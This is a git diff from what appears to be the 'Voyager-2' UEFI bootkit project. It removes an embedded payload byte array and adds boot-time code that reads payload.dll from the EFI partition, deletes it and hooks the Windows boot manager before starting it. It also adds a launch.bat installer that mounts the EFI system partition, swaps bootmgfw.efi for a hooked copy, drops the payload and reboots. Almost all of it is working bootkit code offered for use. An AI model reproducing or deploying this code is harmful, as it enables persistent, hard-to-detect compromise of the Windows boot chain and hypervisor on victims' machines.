0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0xAD, 0xAA, 0x76, 0x5F, 0x00, 0x00, 0x00, 0x00, - 0x02, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0x38, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAD, 0xAA, 0x76, 0x5F, - 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, - 0x94, 0x20, 0x00, 0x00, 0x94, 0x06, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, - 0x35, 0xAA, 0x1D, 0x11, 0xD6, 0x5E, 0x2B, 0x42, 0x99, 0xE3, 0x79, 0xBA, - 0x66, 0x84, 0x9F, 0x18, 0x05, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x55, - 0x73, 0x65, 0x72, 0x73, 0x5C, 0x78, 0x65, 0x72, 0x6F, 0x78, 0x5C, 0x44, - 0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x76, 0x6F, 0x79, 0x61, 0x67, - 0x65, 0x72, 0x5C, 0x56, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x2D, 0x32, - 0x5C, 0x78, 0x36, 0x34, 0x5C, 0x52, 0x65, 0x6C, 0x65, 0x61, 0x73, 0x65, - 0x5C, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, 0x64, 0x2E, 0x70, 0x64, 0x62, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0x69, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x38, 0x00, 0x00, 0x00, - 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0xBC, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7A, - 0x7A, 0x7A, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, - 0x28, 0x00, 0x00, 0x00, 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x40, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x2E, 0x65, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x32, 0x40, 0x00, 0x00, - 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x28, 0x40, 0x00, 0x00, 0x2C, 0x40, 0x00, 0x00, 0x30, 0x40, 0x00, 0x00, - 0x00, 0x30, 0x00, 0x00, 0x3E, 0x40, 0x00, 0x00, 0x00, 0x00, 0x50, 0x61, - 0x79, 0x4C, 0x6F, 0x61, 0x64, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x3F, 0x76, - 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x5F, 0x63, 0x6F, 0x6E, 0x74, 0x65, - 0x78, 0x74, 0x40, 0x73, 0x76, 0x6D, 0x40, 0x40, 0x33, 0x55, 0x5F, 0x76, - 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x5F, 0x74, 0x40, 0x31, 0x40, 0x41, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00 -}; \ No newline at end of file + EFI_STATUS Result = EFI_SUCCESS; + UINTN HandleCount = NULL; + EFI_HANDLE* Handles = NULL; + EFI_FILE_HANDLE VolumeHandle; + EFI_FILE_HANDLE PayLoadFileHandle; + EFI_DEVICE_PATH* PayLoadDevicePath = NULL; + EFI_FILE_IO_INTERFACE* FileSystem = NULL; + EFI_FILE_PROTOCOL* PayLoadFile = NULL; + + if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles)))) + { + Print(L"error getting file system handles -> 0x%p\n", Result); + return Result; + } + + for (UINT32 Idx = 0u; Idx < HandleCount; ++Idx) + { + if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL)))) + { + Print(L"error opening protocol -> 0x%p\n", Result); + return Result; + } + + if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle)))) + { + Print(L"error opening file system -> 0x%p\n", Result); + return Result; + } + + if (!EFI_ERROR((Result = VolumeHandle->Open(VolumeHandle, &PayLoadFileHandle, PAYLOAD_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY)))) + { + VolumeHandle->Close(VolumeHandle); + PayLoadDevicePath = FileDevicePath(Handles[Idx], PAYLOAD_PATH); + + if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&PayLoadDevicePath, &PayLoadFile, EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, NULL)))) + { + Print(L"failed to open payload file... reason -> %r\n", Result); + return Result; + } + + EFI_FILE_INFO* FileInfoPtr = NULL; + UINTN FileInfoSize = NULL; + + if (EFI_ERROR((Result = PayLoadFile->GetInfo(PayLoadFile, &gEfiFileInfoGuid, &FileInfoSize, NULL)))) + { + if (Result == EFI_BUFFER_TOO_SMALL) + { + gBS->AllocatePool(EfiBootServicesData, FileInfoSize, &FileInfoPtr); + if (EFI_ERROR(Result = PayLoadFile->GetInfo(PayLoadFile, &gEfiFileInfoGuid, &FileInfoSize, FileInfoPtr))) + { + Print(L"get backup file information failed... reason -> %r\n", Result); + return Result; + } + } + else + { + Print(L"Failed to get file information... reason -> %r\n", Result); + return Result; + } + } + + VOID* PayLoadBuffer = NULL; + UINTN PayLoadSize = FileInfoPtr->FileSize; + gBS->AllocatePool(EfiBootServicesData, FileInfoPtr->FileSize, &PayLoadBuffer); + + if (EFI_ERROR((Result = PayLoadFile->Read(PayLoadFile, &PayLoadSize, PayLoadBuffer)))) + { + Print(L"Failed to read payload file into buffer... reason -> %r\n", Result); + return Result; + } + + if (EFI_ERROR((Result = PayLoadFile->Delete(PayLoadFile)))) + { + Print(L"unable to delete payload file... reason -> %r\n", Result); + return Result; + } + + *PayLoadBufferPtr = PayLoadBuffer; + gBS->FreePool(FileInfoPtr); + return EFI_SUCCESS; + } + } + + Print(L"unable to find payload on disk...\n"); + return EFI_ABORTED; +} \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h index cce752e..94b94dd 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h +++ b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.h @@ -1,6 +1,7 @@ #pragma once #include "Utils.h" -extern unsigned char PayLoad[2560]; +#include +extern VOID* PayLoad; #pragma pack(push, 1) typedef struct _VOYAGER_T @@ -10,8 +11,12 @@ typedef struct _VOYAGER_T UINT64 HypervModuleSize; UINT64 ModuleBase; UINT64 ModuleSize; -} VOYAGER_T, *PVOYAGER_T; +} VOYAGER_T, * PVOYAGER_T; #pragma pack(pop) +#define WINDOWS_BOOTMGFW_PATH L"\\efi\\microsoft\\boot\\bootmgfw.efi" +#define PAYLOAD_PATH L"\\efi\\microsoft\\boot\\payload.dll" + UINT32 PayLoadSize(VOID); +EFI_STATUS LoadPayLoadFromDisk(VOID** PayLoadBufferPtr); VOID* PayLoadEntry(VOID* ModuleBase); \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c b/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c index 42b7ad3..5283dbb 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c +++ b/Voyager-2/Voyager-2 (2004-1709)/UefiMain.c @@ -4,36 +4,59 @@ CHAR8* gEfiCallerBaseName = "Voyager 2"; const UINT32 _gUefiDriverRevision = 0x200; -EFI_STATUS EFIAPI UefiUnload( - IN EFI_HANDLE ImageHandle -) -{ return EFI_SUCCESS; } - -EFI_STATUS EFIAPI UefiMain -( - IN EFI_HANDLE ImageHandle, - IN EFI_SYSTEM_TABLE* SystemTable -) +EFI_STATUS EFIAPI UefiUnload(EFI_HANDLE ImageHandle) +{ + return EFI_SUCCESS; +} + +EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE* SystemTable) { EFI_STATUS Result; - EFI_DEVICE_PATH_PROTOCOL* BootMgfwPath; + EFI_HANDLE BootMgfwHandle; gST->ConOut->ClearScreen(gST->ConOut); gST->ConOut->OutputString(gST->ConOut, AsciiArt); Print(L"\n"); + // since we replaced bootmgfw on disk, we are going to need to restore the image back + // this is simply just moving bootmgfw.efi.backup to bootmgfw.efi... if (EFI_ERROR((Result = RestoreBootMgfw()))) { Print(L"unable to restore bootmgfw... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); + return Result; + } + + // the payload is sitting on disk... we are going to load it into memory... + if (EFI_ERROR((Result = LoadPayLoadFromDisk(&PayLoad)))) + { + Print(L"failed to read payload from disk... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); return Result; } - if (EFI_ERROR((Result = InstallBootMgfwHooks(ImageHandle)))) + EFI_DEVICE_PATH* BootMgfwPath = GetBootMgfwPath(); + if (EFI_ERROR((Result = gBS->LoadImage(TRUE, ImageHandle, BootMgfwPath, NULL, NULL, &BootMgfwHandle)))) + { + Print(L"failed to load bootmgfw.efi...\n"); + gBS->Stall(5 * 1000000); + return EFI_ABORTED; + } + + if (EFI_ERROR((Result = InstallBootMgfwHooks(BootMgfwHandle)))) { Print(L"Failed to install bootmgfw hooks... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); return Result; } + if (EFI_ERROR(gBS->StartImage(BootMgfwHandle, NULL, NULL))) + { + Print(L"Failed to start bootmgfw.efi...\n"); + gBS->Stall(5 * 1000000); + return EFI_ABORTED; + } + gBS->Stall(5 * 1000000); return EFI_SUCCESS; } \ No newline at end of file diff --git a/launch.bat b/launch.bat new file mode 100644 index 0000000..f7cb2ef --- /dev/null +++ b/launch.bat @@ -0,0 +1,15 @@ +@echo off +net session >nul 2>&1 +if %errorLevel% == 0 ( + mountvol X: /S + move X:\EFI\Microsoft\Boot\bootmgfw.efi X:\EFI\Microsoft\Boot\bootmgfw.efi.backup + xcopy %~dp0bootmgfw.efi X:\EFI\Microsoft\Boot\ + xcopy %~dp0payload.dll X:\EFI\Microsoft\Boot\ + + echo press enter to reboot... + pause + shutdown /r /t 0 +) else ( + echo Failure: Please run as admin. + pause +) \ No newline at end of file